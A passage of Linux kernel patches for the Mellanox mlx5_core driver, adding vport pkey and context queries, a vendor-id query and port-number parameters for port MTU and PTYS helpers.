MLX5_ST_SZ_BYTES(query_hca_vport_pkey_in); + int out_sz = MLX5_ST_SZ_BYTES(query_hca_vport_pkey_out); + int is_group_manager; + void *out = NULL; + void *in = NULL; + void *pkarr; + int nout; + int tbsz; + int err; + int i; + + is_group_manager = MLX5_CAP_GEN(dev, vport_group_manager); + + tbsz = mlx5_to_sw_pkey_sz(MLX5_CAP_GEN(dev, pkey_table_size)); + if (pkey_index > tbsz && pkey_index != 0xffff) + return -EINVAL; + + if (pkey_index == 0xffff) + nout = tbsz; + else + nout = 1; + + out_sz += nout * MLX5_ST_SZ_BYTES(pkey); + + in = kzalloc(in_sz, GFP_KERNEL); + out = kzalloc(out_sz, GFP_KERNEL); + if (!in || !out) { + err = -ENOMEM; + goto out; + } + + MLX5_SET(query_hca_vport_pkey_in, in, opcode, MLX5_CMD_OP_QUERY_HCA_VPORT_PKEY); + if (other_vport) { + if (is_group_manager) { + MLX5_SET(query_hca_vport_pkey_in, in, vport_number, vf_num); + MLX5_SET(query_hca_vport_pkey_in, in, other_vport, 1); + } else { + err = -EPERM; + goto out; + } + } + MLX5_SET(query_hca_vport_pkey_in, in, pkey_index, pkey_index); + + if (MLX5_CAP_GEN(dev, num_ports) == 2) + MLX5_SET(query_hca_vport_pkey_in, in, port_num, port_num); + + err = mlx5_cmd_exec(dev, in, in_sz, out, out_sz); + if (err) + goto out; + + err = mlx5_cmd_status_to_err_v2(out); + if (err) + goto out; + + pkarr = MLX5_ADDR_OF(query_hca_vport_pkey_out, out, pkey); + for (i = 0; i < nout; i++, pkey++, pkarr += MLX5_ST_SZ_BYTES(pkey)) + *pkey = MLX5_GET_PR(pkey, pkarr, pkey); + +out: + kfree(in); + kfree(out); + return err; +} +EXPORT_SYMBOL_GPL(mlx5_query_hca_vport_pkey); + +int mlx5_query_hca_vport_context(struct mlx5_core_dev *dev, + u8 other_vport, u8 port_num, + u16 vf_num, + struct mlx5_hca_vport_context *rep) +{ + int out_sz = MLX5_ST_SZ_BYTES(query_hca_vport_context_out); + int in[MLX5_ST_SZ_DW(query_hca_vport_context_in)]; + int is_group_manager; + void *out; + void *ctx; + int err; + + is_group_manager = MLX5_CAP_GEN(dev, vport_group_manager); + + memset(in, 0, sizeof(in)); + out = kzalloc(out_sz, GFP_KERNEL); + if (!out) + return -ENOMEM; + + MLX5_SET(query_hca_vport_context_in, in, opcode, MLX5_CMD_OP_QUERY_HCA_VPORT_CONTEXT); + + if (other_vport) { + if (is_group_manager) { + MLX5_SET(query_hca_vport_context_in, in, other_vport, 1); + MLX5_SET(query_hca_vport_context_in, in, vport_number, vf_num); + } else { + err = -EPERM; + goto ex; + } + } + + if (MLX5_CAP_GEN(dev, num_ports) == 2) + MLX5_SET(query_hca_vport_context_in, in, port_num, port_num); + + err = mlx5_cmd_exec(dev, in, sizeof(in), out, out_sz); + if (err) + goto ex; + err = mlx5_cmd_status_to_err_v2(out); + if (err) + goto ex; + + ctx = MLX5_ADDR_OF(query_hca_vport_context_out, out, hca_vport_context); + rep->field_select = MLX5_GET_PR(hca_vport_context, ctx, field_select); + rep->sm_virt_aware = MLX5_GET_PR(hca_vport_context, ctx, sm_virt_aware); + rep->has_smi = MLX5_GET_PR(hca_vport_context, ctx, has_smi); + rep->has_raw = MLX5_GET_PR(hca_vport_context, ctx, has_raw); + rep->policy = MLX5_GET_PR(hca_vport_context, ctx, vport_state_policy); + rep->phys_state = MLX5_GET_PR(hca_vport_context, ctx, + port_physical_state); + rep->vport_state = MLX5_GET_PR(hca_vport_context, ctx, vport_state); + rep->port_physical_state = MLX5_GET_PR(hca_vport_context, ctx, + port_physical_state); + rep->port_guid = MLX5_GET64_PR(hca_vport_context, ctx, port_guid); + rep->node_guid = MLX5_GET64_PR(hca_vport_context, ctx, node_guid); + rep->cap_mask1 = MLX5_GET_PR(hca_vport_context, ctx, cap_mask1); + rep->cap_mask1_perm = MLX5_GET_PR(hca_vport_context, ctx, + cap_mask1_field_select); + rep->cap_mask2 = MLX5_GET_PR(hca_vport_context, ctx, cap_mask2); + rep->cap_mask2_perm = MLX5_GET_PR(hca_vport_context, ctx, + cap_mask2_field_select); + rep->lid = MLX5_GET_PR(hca_vport_context, ctx, lid); + rep->init_type_reply = MLX5_GET_PR(hca_vport_context, ctx, + init_type_reply); + rep->lmc = MLX5_GET_PR(hca_vport_context, ctx, lmc); + rep->subnet_timeout = MLX5_GET_PR(hca_vport_context, ctx, + subnet_timeout); + rep->sm_lid = MLX5_GET_PR(hca_vport_context, ctx, sm_lid); + rep->sm_sl = MLX5_GET_PR(hca_vport_context, ctx, sm_sl); + rep->qkey_violation_counter = MLX5_GET_PR(hca_vport_context, ctx, + qkey_violation_counter); + rep->pkey_violation_counter = MLX5_GET_PR(hca_vport_context, ctx, + pkey_violation_counter); + rep->grh_required = MLX5_GET_PR(hca_vport_context, ctx, grh_required); + rep->sys_image_guid = MLX5_GET64_PR(hca_vport_context, ctx, + system_image_guid); + +ex: + kfree(out); + return err; +} +EXPORT_SYMBOL_GPL(mlx5_query_hca_vport_context); + +int mlx5_query_hca_vport_system_image_guid(struct mlx5_core_dev *dev, + __be64 *sys_image_guid) +{ + struct mlx5_hca_vport_context *rep; + int err; + + rep = kzalloc(sizeof(*rep), GFP_KERNEL); + if (!rep) + return -ENOMEM; + + err = mlx5_query_hca_vport_context(dev, 0, 1, 0, rep); + if (!err) + *sys_image_guid = rep->sys_image_guid; + + kfree(rep); + return err; +} +EXPORT_SYMBOL_GPL(mlx5_query_hca_vport_system_image_guid); + +int mlx5_query_hca_vport_node_guid(struct mlx5_core_dev *dev, + u64 *node_guid) +{ + struct mlx5_hca_vport_context *rep; + int err; + + rep = kzalloc(sizeof(*rep), GFP_KERNEL); + if (!rep) + return -ENOMEM; + + err = mlx5_query_hca_vport_context(dev, 0, 1, 0, rep); + if (!err) + *node_guid = rep->node_guid; + + kfree(rep); + return err; +} +EXPORT_SYMBOL_GPL(mlx5_query_hca_vport_node_guid); diff --git a/include/linux/mlx5/device.h b/include/linux/mlx5/device.h index b288c538347a..b2c43508a737 100644 --- a/include/linux/mlx5/device.h +++ b/include/linux/mlx5/device.h @@ -99,6 +99,12 @@ __mlx5_mask(typ, fld)) #define MLX5_GET64(typ, p, fld) be64_to_cpu(*((__be64 *)(p) + __mlx5_64_off(typ, fld))) +#define MLX5_GET64_PR(typ, p, fld) ({ \ + u64 ___t = MLX5_GET64(typ, p, fld); \ + pr_debug(#fld " = 0x%llx\n", ___t); \ + ___t; \ +}) + enum { MLX5_MAX_COMMANDS = 32, MLX5_CMD_DATA_BLOCK_SIZE = 512, @@ -1172,4 +1178,11 @@ enum { MLX5_CMD_STAT_BAD_SIZE_OUTS_CQES_ERR = 0x40, }; +static inline u16 mlx5_to_sw_pkey_sz(int pkey_sz) +{ + if (pkey_sz > MLX5_MAX_LOG_PKEY_TABLE) + return 0; + return MLX5_MIN_PKEY_TABLE_SIZE << pkey_sz; +} + #endif /* MLX5_DEVICE_H */ diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index ba9f212c94bb..8ab8b8af5c32 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -553,6 +553,41 @@ struct mlx5_pas { u8 log_sz; }; +enum port_state_policy { + MLX5_AAA_000 +}; + +enum phy_port_state { + MLX5_AAA_111 +}; + +struct mlx5_hca_vport_context { + u32 field_select; + bool sm_virt_aware; + bool has_smi; + bool has_raw; + enum port_state_policy policy; + enum phy_port_state phys_state; + enum ib_port_state vport_state; + u8 port_physical_state; + u64 sys_image_guid; + u64 port_guid; + u64 node_guid; + u32 cap_mask1; + u32 cap_mask1_perm; + u32 cap_mask2; + u32 cap_mask2_perm; + u16 lid; + u8 init_type_reply; /* bitmask: see ib spec 14.2.5.6 InitTypeReply */ + u8 lmc; + u8 subnet_timeout; + u16 sm_lid; + u8 sm_sl; + u16 qkey_violation_counter; + u16 pkey_violation_counter; + bool grh_required; +}; + static inline void *mlx5_buf_offset(struct mlx5_buf *buf, int offset) { return buf->direct.buf + offset; @@ -792,4 +827,14 @@ struct mlx5_profile { } mr_cache[MAX_MR_CACHE_ENTRIES]; }; +static inline int mlx5_get_gid_table_len(u16 param) +{ + if (param > 4) { + pr_warn("gid table length is zero\n"); + return 0; + } + + return 8 * (1 << param); +} + #endif /* MLX5_DRIVER_H */ diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h index dbe2b32c0539..f06d054ad021 100644 --- a/include/linux/mlx5/mlx5_ifc.h +++ b/include/linux/mlx5/mlx5_ifc.h @@ -2221,12 +2221,15 @@ struct mlx5_ifc_hca_vport_context_bits { u8 has_smi[0x1]; u8 has_raw[0x1]; u8 grh_required[0x1]; - u8 reserved_1[0x10]; - u8 port_state_policy[0x4]; - u8 phy_port_state[0x4]; + u8 reserved_1[0xc]; + u8 port_physical_state[0x4]; + u8 vport_state_policy[0x4]; + u8 port_state[0x4]; u8 vport_state[0x4]; - u8 reserved_2[0x60]; + u8 reserved_2[0x20]; + + u8 system_image_guid[0x40]; u8 port_guid[0x40]; @@ -3490,7 +3493,8 @@ struct mlx5_ifc_query_hca_vport_pkey_in_bits { u8 op_mod[0x10]; u8 other_vport[0x1]; - u8 reserved_2[0xf]; + u8 reserved_2[0xb]; + u8 port_num[0x4]; u8 vport_number[0x10]; u8 reserved_3[0x10]; @@ -3519,7 +3523,8 @@ struct mlx5_ifc_query_hca_vport_gid_in_bits { u8 op_mod[0x10]; u8 other_vport[0x1]; - u8 reserved_2[0xf]; + u8 reserved_2[0xb]; + u8 port_num[0x4]; u8 vport_number[0x10]; u8 reserved_3[0x10]; @@ -3545,7 +3550,8 @@ struct mlx5_ifc_query_hca_vport_context_in_bits { u8 op_mod[0x10]; u8 other_vport[0x1]; - u8 reserved_2[0xf]; + u8 reserved_2[0xb]; + u8 port_num[0x4]; u8 vport_number[0x10]; u8 reserved_3[0x20]; @@ -4243,7 +4249,8 @@ struct mlx5_ifc_modify_hca_vport_context_in_bits { u8 op_mod[0x10]; u8 other_vport[0x1]; - u8 reserved_2[0xf]; + u8 reserved_2[0xb]; + u8 port_num[0x4]; u8 vport_number[0x10]; u8 reserved_3[0x20]; diff --git a/include/linux/mlx5/vport.h b/include/linux/mlx5/vport.h index 99d0e9f85432..67882a834efb 100644 --- a/include/linux/mlx5/vport.h +++ b/include/linux/mlx5/vport.h @@ -37,5 +37,19 @@ u8 mlx5_query_vport_state(struct mlx5_core_dev *mdev, u8 opmod); void mlx5_query_nic_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr); +int mlx5_query_hca_vport_gid(struct mlx5_core_dev *dev, u8 other_vport, + u8 port_num, u16 vf_num, u16 gid_index, + union ib_gid *gid); +int mlx5_query_hca_vport_pkey(struct mlx5_core_dev *dev, u8 other_vport, + u8 port_num, u16 vf_num, u16 pkey_index, + u16 *pkey); +int mlx5_query_hca_vport_context(struct mlx5_core_dev *dev, + u8 other_vport, u8 port_num, + u16 vf_num, + struct mlx5_hca_vport_context *rep); +int mlx5_query_hca_vport_system_image_guid(struct mlx5_core_dev *dev, + __be64 *sys_image_guid); +int mlx5_query_hca_vport_node_guid(struct mlx5_core_dev *dev, + u64 *node_guid); #endif /* __MLX5_VPORT_H__ */ From 211e6c80e5a68ef39a81484583e8efbf9774627d Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Thu, 4 Jun 2015 19:30:42 +0300 Subject: [PATCH 713/872] net/mlx5_core: Get vendor-id using the query adapter command Add two wrapper functions to the query adapter command: 1. mlx5_query_board_id -- replaces the old mlx5_cmd_query_adapter. 2. mlx5_core_query_vendor_id -- retrieves the vendor_id from the query_adapter command. Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/fw.c | 59 ++++++++++++++----- .../net/ethernet/mellanox/mlx5/core/main.c | 4 +- .../ethernet/mellanox/mlx5/core/mlx5_core.h | 2 +- include/linux/mlx5/driver.h | 1 + include/linux/mlx5/mlx5_ifc.h | 7 ++- 5 files changed, 53 insertions(+), 20 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw.c b/drivers/net/ethernet/mellanox/mlx5/core/fw.c index 801ccadd709a..ba87442ef776 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/fw.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/fw.c @@ -35,34 +35,63 @@ #include #include "mlx5_core.h" -int mlx5_cmd_query_adapter(struct mlx5_core_dev *dev) +int mlx5_cmd_query_adapter(struct mlx5_core_dev *dev, u32 *out, int outlen) { - struct mlx5_cmd_query_adapter_mbox_out *out; - struct mlx5_cmd_query_adapter_mbox_in in; + u32 in[MLX5_ST_SZ_DW(query_adapter_in)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(query_adapter_in, in, opcode, MLX5_CMD_OP_QUERY_ADAPTER); + + return mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, outlen); +} + +int mlx5_query_board_id(struct mlx5_core_dev *dev) +{ + u32 *out; + int outlen = MLX5_ST_SZ_BYTES(query_adapter_out); int err; - out = kzalloc(sizeof(*out), GFP_KERNEL); + out = kzalloc(outlen, GFP_KERNEL); if (!out) return -ENOMEM; - memset(&in, 0, sizeof(in)); - in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_QUERY_ADAPTER); - err = mlx5_cmd_exec(dev, &in, sizeof(in), out, sizeof(*out)); + err = mlx5_cmd_query_adapter(dev, out, outlen); if (err) - goto out_out; + goto out; - if (out->hdr.status) { - err = mlx5_cmd_status_to_err(&out->hdr); - goto out_out; - } + memcpy(dev->board_id, + MLX5_ADDR_OF(query_adapter_out, out, + query_adapter_struct.vsd_contd_psid), + MLX5_FLD_SZ_BYTES(query_adapter_out, + query_adapter_struct.vsd_contd_psid)); - memcpy(dev->board_id, out->vsd_psid, sizeof(out->vsd_psid)); - -out_out: +out: kfree(out); + return err; +} + +int mlx5_core_query_vendor_id(struct mlx5_core_dev *mdev, u32 *vendor_id) +{ + u32 *out; + int outlen = MLX5_ST_SZ_BYTES(query_adapter_out); + int err; + + out = kzalloc(outlen, GFP_KERNEL); + if (!out) + return -ENOMEM; + err = mlx5_cmd_query_adapter(mdev, out, outlen); + if (err) + goto out; + + *vendor_id = MLX5_GET(query_adapter_out, out, + query_adapter_struct.ieee_vendor_id); +out: + kfree(out); return err; } +EXPORT_SYMBOL(mlx5_core_query_vendor_id); int mlx5_query_hca_caps(struct mlx5_core_dev *dev) { diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c index 58354122dfe4..afad529838de 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c @@ -768,9 +768,9 @@ static int mlx5_dev_init(struct mlx5_core_dev *dev, struct pci_dev *pdev) goto err_stop_poll; } - err = mlx5_cmd_query_adapter(dev); + err = mlx5_query_board_id(dev); if (err) { - dev_err(&pdev->dev, "query adapter failed\n"); + dev_err(&pdev->dev, "query board id failed\n"); goto err_stop_poll; } diff --git a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h index 6983c1047255..fc88ecaecb4b 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h +++ b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h @@ -78,7 +78,7 @@ static inline int mlx5_cmd_exec_check_status(struct mlx5_core_dev *dev, u32 *in, } int mlx5_query_hca_caps(struct mlx5_core_dev *dev); -int mlx5_cmd_query_adapter(struct mlx5_core_dev *dev); +int mlx5_query_board_id(struct mlx5_core_dev *dev); int mlx5_cmd_init_hca(struct mlx5_core_dev *dev); int mlx5_cmd_teardown_hca(struct mlx5_core_dev *dev); diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 8ab8b8af5c32..b90fb9336d21 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -817,6 +817,7 @@ struct mlx5_interface { void *mlx5_get_protocol_dev(struct mlx5_core_dev *mdev, int protocol); int mlx5_register_interface(struct mlx5_interface *intf); void mlx5_unregister_interface(struct mlx5_interface *intf); +int mlx5_core_query_vendor_id(struct mlx5_core_dev *mdev, u32 *vendor_id); struct mlx5_profile { u64 mask; diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h index f06d054ad021..6d2f6fee041c 100644 --- a/include/linux/mlx5/mlx5_ifc.h +++ b/include/linux/mlx5/mlx5_ifc.h @@ -2470,9 +2470,12 @@ union mlx5_ifc_cong_control_roce_ecn_auto_bits { }; struct mlx5_ifc_query_adapter_param_block_bits { - u8 reserved_0[0xe0]; + u8 reserved_0[0xc0]; - u8 reserved_1[0x10]; + u8 reserved_1[0x8]; + u8 ieee_vendor_id[0x18]; + + u8 reserved_2[0x10]; u8 vsd_vendor_id[0x10]; u8 vsd[208][0x8]; From e760152d08da78aa160e68ac90bf8f3f10aff462 Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Thu, 4 Jun 2015 19:30:43 +0300 Subject: [PATCH 714/872] net/mlx5_core: Use port number in the query port mtu helpers Extend the function prototypes for max and operational mtu to take the local port number. In the Ethernet driver is this hard coded to one, since ConnectX4 Ethernet devices are always function-per-port. The IB driver also serves older devices (ConnectIB) which isn't such, and hence the part can vary. Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/en_main.c | 4 ++-- drivers/net/ethernet/mellanox/mlx5/core/port.c | 15 +++++++++------ include/linux/mlx5/driver.h | 6 ++++-- 3 files changed, 15 insertions(+), 10 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c index edba09cca600..7348c5173aa9 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c @@ -1386,7 +1386,7 @@ int mlx5e_open_locked(struct net_device *netdev) return err; } - err = mlx5_query_port_oper_mtu(mdev, &actual_mtu); + err = mlx5_query_port_oper_mtu(mdev, &actual_mtu, 1); if (err) { netdev_err(netdev, "%s: mlx5_query_port_oper_mtu failed %d\n", __func__, err); @@ -1614,7 +1614,7 @@ static int mlx5e_change_mtu(struct net_device *netdev, int new_mtu) int max_mtu; int err = 0; - err = mlx5_query_port_max_mtu(mdev, &max_mtu); + err = mlx5_query_port_max_mtu(mdev, &max_mtu, 1); if (err) return err; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/port.c b/drivers/net/ethernet/mellanox/mlx5/core/port.c index 7d3d0f9f328d..d9498aae5ab5 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/port.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/port.c @@ -213,7 +213,8 @@ int mlx5_query_port_status(struct mlx5_core_dev *dev, u8 *status) } static int mlx5_query_port_mtu(struct mlx5_core_dev *dev, - int *admin_mtu, int *max_mtu, int *oper_mtu) + int *admin_mtu, int *max_mtu, int *oper_mtu, + u8 local_port) { u32 in[MLX5_ST_SZ_DW(pmtu_reg)]; u32 out[MLX5_ST_SZ_DW(pmtu_reg)]; @@ -221,7 +222,7 @@ static int mlx5_query_port_mtu(struct mlx5_core_dev *dev, memset(in, 0, sizeof(in)); - MLX5_SET(pmtu_reg, in, local_port, 1); + MLX5_SET(pmtu_reg, in, local_port, local_port); err = mlx5_core_access_reg(dev, in, sizeof(in), out, sizeof(out), MLX5_REG_PMTU, 0, 0); @@ -253,14 +254,16 @@ int mlx5_set_port_mtu(struct mlx5_core_dev *dev, int mtu) } EXPORT_SYMBOL_GPL(mlx5_set_port_mtu); -int mlx5_query_port_max_mtu(struct mlx5_core_dev *dev, int *max_mtu) +int mlx5_query_port_max_mtu(struct mlx5_core_dev *dev, int *max_mtu, + u8 local_port) { - return mlx5_query_port_mtu(dev, NULL, max_mtu, NULL); + return mlx5_query_port_mtu(dev, NULL, max_mtu, NULL, local_port); } EXPORT_SYMBOL_GPL(mlx5_query_port_max_mtu); -int mlx5_query_port_oper_mtu(struct mlx5_core_dev *dev, int *oper_mtu) +int mlx5_query_port_oper_mtu(struct mlx5_core_dev *dev, int *oper_mtu, + u8 local_port) { - return mlx5_query_port_mtu(dev, NULL, NULL, oper_mtu); + return mlx5_query_port_mtu(dev, NULL, NULL, oper_mtu, local_port); } EXPORT_SYMBOL_GPL(mlx5_query_port_oper_mtu); diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index b90fb9336d21..cd09784b6999 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -751,8 +751,10 @@ int mlx5_set_port_status(struct mlx5_core_dev *dev, int mlx5_query_port_status(struct mlx5_core_dev *dev, u8 *status); int mlx5_set_port_mtu(struct mlx5_core_dev *dev, int mtu); -int mlx5_query_port_max_mtu(struct mlx5_core_dev *dev, int *max_mtu); -int mlx5_query_port_oper_mtu(struct mlx5_core_dev *dev, int *oper_mtu); +int mlx5_query_port_max_mtu(struct mlx5_core_dev *dev, int *max_mtu, + u8 local_port); +int mlx5_query_port_oper_mtu(struct mlx5_core_dev *dev, int *oper_mtu, + u8 local_port); int mlx5_debug_eq_add(struct mlx5_core_dev *dev, struct mlx5_eq *eq); void mlx5_debug_eq_remove(struct mlx5_core_dev *dev, struct mlx5_eq *eq); From a05bdefa4081d43f9c86c3bb693d0492a21590da Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Thu, 4 Jun 2015 19:30:44 +0300 Subject: [PATCH 715/872] net/mlx5_core: Use port number when querying port ptys Until now, mlx5_query_port_ptys always queried port number one. Added new argument in the function's prototype so we can also query the second port. This will be needed when thr helper will be invoked from the IB driver on non FPP (Function-Per-Port) devices. Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c | 2 +- drivers/net/ethernet/mellanox/mlx5/core/port.c | 8 ++++---- include/linux/mlx5/driver.h | 2 +- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c index de7aec8abca1..388938482ff9 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c @@ -543,7 +543,7 @@ static int mlx5e_get_settings(struct net_device *netdev, u32 eth_proto_oper; int err; - err = mlx5_query_port_ptys(mdev, out, sizeof(out), MLX5_PTYS_EN); + err = mlx5_query_port_ptys(mdev, out, sizeof(out), MLX5_PTYS_EN, 1); if (err) { netdev_err(netdev, "%s: query port ptys failed: %d\n", diff --git a/drivers/net/ethernet/mellanox/mlx5/core/port.c b/drivers/net/ethernet/mellanox/mlx5/core/port.c index d9498aae5ab5..cbbce40d853c 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/port.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/port.c @@ -104,13 +104,13 @@ int mlx5_set_port_caps(struct mlx5_core_dev *dev, u8 port_num, u32 caps) EXPORT_SYMBOL_GPL(mlx5_set_port_caps); int mlx5_query_port_ptys(struct mlx5_core_dev *dev, u32 *ptys, - int ptys_size, int proto_mask) + int ptys_size, int proto_mask, u8 local_port) { u32 in[MLX5_ST_SZ_DW(ptys_reg)]; int err; memset(in, 0, sizeof(in)); - MLX5_SET(ptys_reg, in, local_port, 1); + MLX5_SET(ptys_reg, in, local_port, local_port); MLX5_SET(ptys_reg, in, proto_mask, proto_mask); err = mlx5_core_access_reg(dev, in, sizeof(in), ptys, @@ -126,7 +126,7 @@ int mlx5_query_port_proto_cap(struct mlx5_core_dev *dev, u32 out[MLX5_ST_SZ_DW(ptys_reg)]; int err; - err = mlx5_query_port_ptys(dev, out, sizeof(out), proto_mask); + err = mlx5_query_port_ptys(dev, out, sizeof(out), proto_mask, 1); if (err) return err; @@ -145,7 +145,7 @@ int mlx5_query_port_proto_admin(struct mlx5_core_dev *dev, u32 out[MLX5_ST_SZ_DW(ptys_reg)]; int err; - err = mlx5_query_port_ptys(dev, out, sizeof(out), proto_mask); + err = mlx5_query_port_ptys(dev, out, sizeof(out), proto_mask, 1); if (err) return err; diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index cd09784b6999..e4b814f64014 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -739,7 +739,7 @@ int mlx5_core_access_reg(struct mlx5_core_dev *dev, void *data_in, int mlx5_set_port_caps(struct mlx5_core_dev *dev, u8 port_num, u32 caps); int mlx5_query_port_ptys(struct mlx5_core_dev *dev, u32 *ptys, - int ptys_size, int proto_mask); + int ptys_size, int proto_mask, u8 local_port); int mlx5_query_port_proto_cap(struct mlx5_core_dev *dev, u32 *proto_cap, int proto_mask); int mlx5_query_port_proto_admin(struct mlx5_core_dev *dev, From a124d13ef59e09941fc0924fd7c29ae6d7cd77a3 Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Thu, 4 Jun 2015 19:30:45 +0300 Subject: [PATCH 716/872] net/mlx5_core: Add more query port helpers Add the following helpers: 1. mlx5_query_port_proto_oper -- queries the port speed port mask 2. mlx5_query_port_link_width_oper - queries the port link with bitmask 3. mlx5_query_port_vl_hw_cap - queries the Virtual Lanes supported on this port These helpers will be used from the IB driver when working in ISSI > 0 mode. Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- .../net/ethernet/mellanox/mlx5/core/port.c | 67 +++++++++++++++++++ include/linux/mlx5/driver.h | 8 +++ 2 files changed, 75 insertions(+) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/port.c b/drivers/net/ethernet/mellanox/mlx5/core/port.c index cbbce40d853c..619d3baf19ea 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/port.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/port.c @@ -158,6 +158,42 @@ int mlx5_query_port_proto_admin(struct mlx5_core_dev *dev, } EXPORT_SYMBOL_GPL(mlx5_query_port_proto_admin); +int mlx5_query_port_link_width_oper(struct mlx5_core_dev *dev, + u8 *link_width_oper, u8 local_port) +{ + u32 out[MLX5_ST_SZ_DW(ptys_reg)]; + int err; + + err = mlx5_query_port_ptys(dev, out, sizeof(out), MLX5_PTYS_IB, local_port); + if (err) + return err; + + *link_width_oper = MLX5_GET(ptys_reg, out, ib_link_width_oper); + + return 0; +} +EXPORT_SYMBOL_GPL(mlx5_query_port_link_width_oper); + +int mlx5_query_port_proto_oper(struct mlx5_core_dev *dev, + u8 *proto_oper, int proto_mask, + u8 local_port) +{ + u32 out[MLX5_ST_SZ_DW(ptys_reg)]; + int err; + + err = mlx5_query_port_ptys(dev, out, sizeof(out), proto_mask, local_port); + if (err) + return err; + + if (proto_mask == MLX5_PTYS_EN) + *proto_oper = MLX5_GET(ptys_reg, out, eth_proto_oper); + else + *proto_oper = MLX5_GET(ptys_reg, out, ib_proto_oper); + + return 0; +} +EXPORT_SYMBOL_GPL(mlx5_query_port_proto_oper); + int mlx5_set_port_proto(struct mlx5_core_dev *dev, u32 proto_admin, int proto_mask) { @@ -267,3 +303,34 @@ int mlx5_query_port_oper_mtu(struct mlx5_core_dev *dev, int *oper_mtu, return mlx5_query_port_mtu(dev, NULL, NULL, oper_mtu, local_port); } EXPORT_SYMBOL_GPL(mlx5_query_port_oper_mtu); + +static int mlx5_query_port_pvlc(struct mlx5_core_dev *dev, u32 *pvlc, + int pvlc_size, u8 local_port) +{ + u32 in[MLX5_ST_SZ_DW(pvlc_reg)]; + int err; + + memset(in, 0, sizeof(in)); + MLX5_SET(ptys_reg, in, local_port, local_port); + + err = mlx5_core_access_reg(dev, in, sizeof(in), pvlc, + pvlc_size, MLX5_REG_PVLC, 0, 0); + + return err; +} + +int mlx5_query_port_vl_hw_cap(struct mlx5_core_dev *dev, + u8 *vl_hw_cap, u8 local_port) +{ + u32 out[MLX5_ST_SZ_DW(pvlc_reg)]; + int err; + + err = mlx5_query_port_pvlc(dev, out, sizeof(out), local_port); + if (err) + return err; + + *vl_hw_cap = MLX5_GET(pvlc_reg, out, vl_hw_cap); + + return 0; +} +EXPORT_SYMBOL_GPL(mlx5_query_port_vl_hw_cap); diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index e4b814f64014..6093bde16b94 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -107,6 +107,7 @@ enum { MLX5_REG_PUDE = 0x5009, MLX5_REG_PMPE = 0x5010, MLX5_REG_PELC = 0x500e, + MLX5_REG_PVLC = 0x500f, MLX5_REG_PMLP = 0, /* TBD */ MLX5_REG_NODE_DESC = 0x6001, MLX5_REG_HOST_ENDIANNESS = 0x7004, @@ -744,6 +745,11 @@ int mlx5_query_port_proto_cap(struct mlx5_core_dev *dev, u32 *proto_cap, int proto_mask); int mlx5_query_port_proto_admin(struct mlx5_core_dev *dev, u32 *proto_admin, int proto_mask); +int mlx5_query_port_link_width_oper(struct mlx5_core_dev *dev, + u8 *link_width_oper, u8 local_port); +int mlx5_query_port_proto_oper(struct mlx5_core_dev *dev, + u8 *proto_oper, int proto_mask, + u8 local_port); int mlx5_set_port_proto(struct mlx5_core_dev *dev, u32 proto_admin, int proto_mask); int mlx5_set_port_status(struct mlx5_core_dev *dev, @@ -755,6 +761,8 @@ int mlx5_query_port_max_mtu(struct 